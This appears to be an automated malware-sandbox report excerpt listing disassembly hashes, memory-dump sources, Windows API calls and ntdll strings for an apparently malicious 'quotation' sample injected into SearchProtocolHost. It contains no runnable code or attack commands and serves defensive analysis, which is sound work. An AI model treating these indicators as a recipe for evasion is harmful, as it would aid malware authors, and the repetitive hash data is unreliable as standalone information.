                                                                                  • Instruction ID: 1700f3ad4c0f76a709351309fb0f4fae0385cc826e2fc8c3b27afda0dcce3e0c
                                                                                  • Opcode Fuzzy Hash: dacb651e7ff44f1af95e30f84ab9e90aac75f6f5346709d099859da3721a670f
                                                                                  • Instruction Fuzzy Hash: 42F0F432751B11BBC736DB5A9D80F97BAAEEB84FD0F008428E60597640CA30ED01CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                  • Instruction ID: 7539443fd580b63065a803fb5170cdc155fe3c75a44c9316ba90f5fe54a37100
                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                  • Instruction Fuzzy Hash: C5F062B2600615ABD324CF4DDD40E67FBEADBD5A90F05812DE655D7220EA31ED05CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                  • Instruction ID: 67d62ef4bf315deed305ffc5c8222cffa8c3571d2bed519f048166c0670038ad
                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                  • Instruction Fuzzy Hash: EAF02B33264A379FD7325B5D4840B7BBA9A8FD1B64F9A0036F3099B240CAB08D1297D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a21c6b5f7ba1c668600ec012ed9c55c2f5dc7e70e0cb86c6a7f7f40d8007ad8d
                                                                                  • Instruction ID: 74c8e9cd1f61713293396d0f6daf85facd9d2a283387798c1656b204b3603b6d
                                                                                  • Opcode Fuzzy Hash: a21c6b5f7ba1c668600ec012ed9c55c2f5dc7e70e0cb86c6a7f7f40d8007ad8d
                                                                                  • Instruction Fuzzy Hash: 33014FB1A1064DEFDB04DFA9D951AAEB7F8FF58704F10406AFA04E7390D6749A01CBA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e42c23fd7e97efd8e51a6443f7d74123700e9a00655977e94357c336fcaf3a1
                                                                                  • Instruction ID: 47c2e2bc5d22abda9947fbd961c2f67a3584acf79c17adf312d1fd830b39d6a4
                                                                                  • Opcode Fuzzy Hash: 1e42c23fd7e97efd8e51a6443f7d74123700e9a00655977e94357c336fcaf3a1
                                                                                  • Instruction Fuzzy Hash: 48012171A1025DEBCB04EFA9D451AAEB7F8FF58704F10406AFA04E7351D6749901CBA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d8f74290566d444f618ea85e6e818031ae6f38a893cfaf972d1302b4cd566ade
                                                                                  • Instruction ID: 52820308325512396c4fb3d30a11077fa4c0b1d1fdb4051226fcfab3c75d234c
                                                                                  • Opcode Fuzzy Hash: d8f74290566d444f618ea85e6e818031ae6f38a893cfaf972d1302b4cd566ade
                                                                                  • Instruction Fuzzy Hash: 6A90023560584882E141715C4414A46005597D0309F55C051A00646D8DD6258E99B761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb1a01f974c0a8502533efdf043e3b78c3eaac17ae1990e06dc4bc79cafaf741
                                                                                  • Instruction ID: 8ec3302b85f48942ddcc4107435947466279bfb1d3c6057c916ce5b75b3c1239
                                                                                  • Opcode Fuzzy Hash: cb1a01f974c0a8502533efdf043e3b78c3eaac17ae1990e06dc4bc79cafaf741
                                                                                  • Instruction Fuzzy Hash: CB90023560180842E181715C441464A004597D1305F95C055A0025698DCA158B9D77A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c96b6a253708caa99e9095a9c2fddf4d277d99ce5ddf665af1d258c40f21fa19
                                                                                  • Instruction ID: a74b8e3c51a180120f6663c91d1e82c38d350d2ada8d3d4d11f1df8631a500d3
                                                                                  • Opcode Fuzzy Hash: c96b6a253708caa99e9095a9c2fddf4d277d99ce5ddf665af1d258c40f21fa19
                                                                                  • Instruction Fuzzy Hash: 9F9002A5601940D29501B25C8414B0A454597E0205B55C056E10545A4CC52589959235
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c6284f92bad9ae7950582e4eaa602ac5f362988161d2fa2307d4ffc6cc1c8ff
                                                                                  • Instruction ID: c8a5d90ec3f92db8db7824190e9f49afac778f8ca861c46d2646ae939cb55d01
                                                                                  • Opcode Fuzzy Hash: 6c6284f92bad9ae7950582e4eaa602ac5f362988161d2fa2307d4ffc6cc1c8ff
                                                                                  • Instruction Fuzzy Hash: B5900229621800425146B55C061450B0485A7D6355395C055F14165D4CC62189A95321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 893f5efc80c3251fd95f66e1dfbb8012140931f82fa871df00df0226b995bb6f
                                                                                  • Instruction ID: e6de8957ede4bdbfa23cc64c550fc3c3c82acd7d8177ce81ef4ba4e5d6540b77
                                                                                  • Opcode Fuzzy Hash: 893f5efc80c3251fd95f66e1dfbb8012140931f82fa871df00df0226b995bb6f
                                                                                  • Instruction Fuzzy Hash: FB900229611800435106B55C0714507008697D5355355C061F1015594CD62189A55221
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60a4698b6335ce8b4893ab1169afd547b052e00a507cae200a028e5e894230d3
                                                                                  • Instruction ID: cdfae4e1b9b4469696155d2245b4d22ab19260d20ae5ac4542232776767bd038
                                                                                  • Opcode Fuzzy Hash: 60a4698b6335ce8b4893ab1169afd547b052e00a507cae200a028e5e894230d3
                                                                                  • Instruction Fuzzy Hash: 0C90022570180043E141715C54286064045E7E1305F55D051E0414598CD915899A5322
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e755a64648095aefe804012f45839164b37a6ad9640e0aaa2b932e83d6536f6
                                                                                  • Instruction ID: b8b77ebb9d5bf6009f94c298ce9b51573d59b7f2fdd73061390a8c1c32870d60
                                                                                  • Opcode Fuzzy Hash: 2e755a64648095aefe804012f45839164b37a6ad9640e0aaa2b932e83d6536f6
                                                                                  • Instruction Fuzzy Hash: 1F90022560584482E101755C5418A06004597D0209F55D051A10645D9DC6358995A231
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a4d5ac5fc83b29c4b7e9b6f74319fb57a3ec2e32ee7a60f16de0d231880f3c2
                                                                                  • Instruction ID: 1a9dfcab5dc651dbad96b46c35521e937f5d91acb411fbc997e2a9eaf54526bb
                                                                                  • Opcode Fuzzy Hash: 3a4d5ac5fc83b29c4b7e9b6f74319fb57a3ec2e32ee7a60f16de0d231880f3c2
                                                                                  • Instruction Fuzzy Hash: 6890022D61380042E181715C541860A004597D1206F95D455A001559CCC91589AD5321
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f2f3d47226ec02d722bb7ffd2a21150c66b5fcd4e0da358e283a7a363e2cd0c
                                                                                  • Instruction ID: b2d6c91f3e8005eec4afc7484ca7c7b231e08ea05d5241a5fdf36dcb6aad31eb
                                                                                  • Opcode Fuzzy Hash: 8f2f3d47226ec02d722bb7ffd2a21150c66b5fcd4e0da358e283a7a363e2cd0c
                                                                                  • Instruction Fuzzy Hash: B390023564180442E142715C44146060049A7D0245F95C052A0424598EC6558B9AAB61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5d70b923c021626ca15a0454bd310785fb93f53a2e184b70322df6eb51d9a745
                                                                                  • Instruction ID: 0b179ebcef0aa1e2dcb2418156232e2643b55247fc61ef2e3c7c682ddbb68d24
                                                                                  • Opcode Fuzzy Hash: 5d70b923c021626ca15a0454bd310785fb93f53a2e184b70322df6eb51d9a745
                                                                                  • Instruction Fuzzy Hash: E390022564284192A546B15C44145074046A7E0245795C052A1414994CC526999AD721
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd9cefca4a64a79f6ace67c5587d18deb9c129437d465ffaba58feeb7a30760e
                                                                                  • Instruction ID: 8331cc416c11ee83cb57293d3730d4b11b27f34306a7f2d1735342178e8ca334
                                                                                  • Opcode Fuzzy Hash: dd9cefca4a64a79f6ace67c5587d18deb9c129437d465ffaba58feeb7a30760e
                                                                                  • Instruction Fuzzy Hash: D890023560180882E101715C4414B46004597E0305F55C056A0124698DC615C9957621
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7ca805ef73d836b05de8f77063b742b9589bb4f6912f0566124eb02b4d98e619
                                                                                  • Instruction ID: e0a1b3e876f82e9ac6fa29f77b1be459cd5b975ffa8d3c862d5b64e6d1acdb0d
                                                                                  • Opcode Fuzzy Hash: 7ca805ef73d836b05de8f77063b742b9589bb4f6912f0566124eb02b4d98e619
                                                                                  • Instruction Fuzzy Hash: 9490023560180442E101759C5418646004597E0305F55D051A5024599EC66589D56231
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 289a3f83f84ab1dcc5d2e36a4b3b1a927a10ce9f4a3f17b42b93157ecb8bfdff
                                                                                  • Instruction ID: 2714c9276c409be6bae43d7ab7a65662820eb9238c148350d08adba9cf5b7eef
                                                                                  • Opcode Fuzzy Hash: 289a3f83f84ab1dcc5d2e36a4b3b1a927a10ce9f4a3f17b42b93157ecb8bfdff
                                                                                  • Instruction Fuzzy Hash: 4490023560180443E101715C5518707004597D0205F55D451A042459CDD65689956221
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdcd48b0a71cc167abea9f3c9be199969602f9750266d29c715e389f0a337ca6
                                                                                  • Instruction ID: 67d8f8294fad7a86297a767c5b3df5d637adfd052bd15ffde4e72f383bfa7a2e
                                                                                  • Opcode Fuzzy Hash: bdcd48b0a71cc167abea9f3c9be199969602f9750266d29c715e389f0a337ca6
                                                                                  • Instruction Fuzzy Hash: BB900225A0580442E141715C5428706005597D0205F55D051A0024598DC6598B9967A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 507f2a25e6d85b37f0a2182c014ad8127a606484c7341d644c82ebbe724d1c3f
                                                                                  • Instruction ID: 639fbbc12f9f3e1b834cdad27bf0c142211ffd5e179c668a33a877d3ddfcea98
                                                                                  • Opcode Fuzzy Hash: 507f2a25e6d85b37f0a2182c014ad8127a606484c7341d644c82ebbe724d1c3f
                                                                                  • Instruction Fuzzy Hash: 7C90026574180482E101715C4424B060045D7E1305F55C055E1064598DC619CD966226
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 08683c7dedf45bd3b8d7fe052f0899caf72fa2fc3f8bbca19dfe26b49d8820cb
                                                                                  • Instruction ID: 0044d8e40ab37e28cef5a35693e5a391448fb3b277400fe0c308f653e75f867a
                                                                                  • Opcode Fuzzy Hash: 08683c7dedf45bd3b8d7fe052f0899caf72fa2fc3f8bbca19dfe26b49d8820cb
                                                                                  • Instruction Fuzzy Hash: 4790026561180082E105715C4414706008597E1205F55C052A2154598CC5298DA55225
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4ef97bda5e0dd0ef960611a00915c0959efe638a59d65bc3cce53224396b4637
                                                                                  • Instruction ID: 6244a04e71c7d65b0232738d2fd85ede13cc6130c06f4bbf165df4458af59850
                                                                                  • Opcode Fuzzy Hash: 4ef97bda5e0dd0ef960611a00915c0959efe638a59d65bc3cce53224396b4637
                                                                                  • Instruction Fuzzy Hash: FF900235601C0442E101715C4818747004597D0306F55C051A5164599EC665C9D56631
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01324725
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01324655
                                                                                  • ExecuteOptions, xrefs: 013246A0
                                                                                  • Execute=1, xrefs: 01324713
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01324742
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013246FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01324787
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 0132031E
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013202E7
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013202BD
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01327BAC
                                                                                  • RTL: Resource at %p, xrefs: 01327B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01327B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 14f6519e90b43f85c974d7ead204bebdc610a152bf8ed021548880b75d9bf7b0
                                                                                  • Instruction ID: 58c1577a418514c554c650ee6ac3f2938842ec7aa93f5928937dbe68893a2073
                                                                                  • Opcode Fuzzy Hash: 14f6519e90b43f85c974d7ead204bebdc610a152bf8ed021548880b75d9bf7b0
                                                                                  • Instruction Fuzzy Hash: A74100357117039FDB21DE29C845B2AB7E5FF98714F400A2DFA5ADB280DB71E8058B91
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0132728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 013272C1
                                                                                  • RTL: Resource at %p, xrefs: 013272A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01327294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 782a50b727ef608923bdca9b373c9aa49e7cb93ad4e7917bcfdb2cea8448fdac
                                                                                  • Instruction ID: 6297b7758375786c06dddc017f1926b91395ea9337147247bd4e7c923fd4e7f5
                                                                                  • Opcode Fuzzy Hash: 782a50b727ef608923bdca9b373c9aa49e7cb93ad4e7917bcfdb2cea8448fdac
                                                                                  • Instruction Fuzzy Hash: E1411035710317ABD721EE29CC41B66B7E5FBA5718F100618F955EB280DB30F81287D1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 2272d77e717a04d85afe40aa72648bb9367b98ffc0655b5d5d9e4ad406818bcd
                                                                                  • Instruction ID: 6aa4cfbdc1bcde0061fe3b1d1fc6005183e242fc3a2a2f81e8bfb425a07d9095
                                                                                  • Opcode Fuzzy Hash: 2272d77e717a04d85afe40aa72648bb9367b98ffc0655b5d5d9e4ad406818bcd
                                                                                  • Instruction Fuzzy Hash: E531B172A102199FDB20DE2DCC40BFFB7FCEB04654F95445AE949E3244EB30AA448BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 9f408157e56de124c8c1721d2097cd780b54ddc73620f8655f6fcaf4da779e85
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 4591A071E2020B9BEB24DF6DC881ABEFBA5AF44720F54463EEB55E72C0D77099418B11
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: e31412a27819a56ac075f15c5fff98fe3796d95f8599dea1220f368bbfda1465
                                                                                  • Instruction ID: 955be05cc14bd9113e5acc8b9b073c78985e4d7be319e5d620215bf1b216e059
                                                                                  • Opcode Fuzzy Hash: e31412a27819a56ac075f15c5fff98fe3796d95f8599dea1220f368bbfda1465
                                                                                  • Instruction Fuzzy Hash: D6811BB1D10269DBDB35CB54CC45BEEB6B8AF08754F1041EAEA19B7280E7705E84CFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.6%
                                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                                  Signature Coverage:2.2%
                                                                                  Total number of Nodes:447
                                                                                  Total number of Limit Nodes:72

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: [$ Z$"|$%$(w$)$1$56f3$H$Hm$K$N\$Qj$OR4"|$R4"|$]$a$d$d9$f3$hy$j$lj$m=hy$n$o$q$v$z$}
                                                                                  • API String ID: 0-4081740624
                                                                                  • Opcode ID: 5b197d86c05f4fcf2ca58b3b03804c3ae91e292cb6a0b5b42f5b150e846c12e9
                                                                                  • Instruction ID: 2979a7934da80d5fecfae83c9131633d1b7dc2f7ab861eb72927ec2bc68d09d5
                                                                                  • Opcode Fuzzy Hash: 5b197d86c05f4fcf2ca58b3b03804c3ae91e292cb6a0b5b42f5b150e846c12e9
                                                                                  • Instruction Fuzzy Hash: 71427DB0906229CBEB64CF44C998BDDBBB2BB45318F1081DAC54D7B281CBB55AC9CF50
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A2C938
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02A2C973
                                                                                  • FindClose.KERNELBASE(?), ref: 02A2C97E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02A394A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
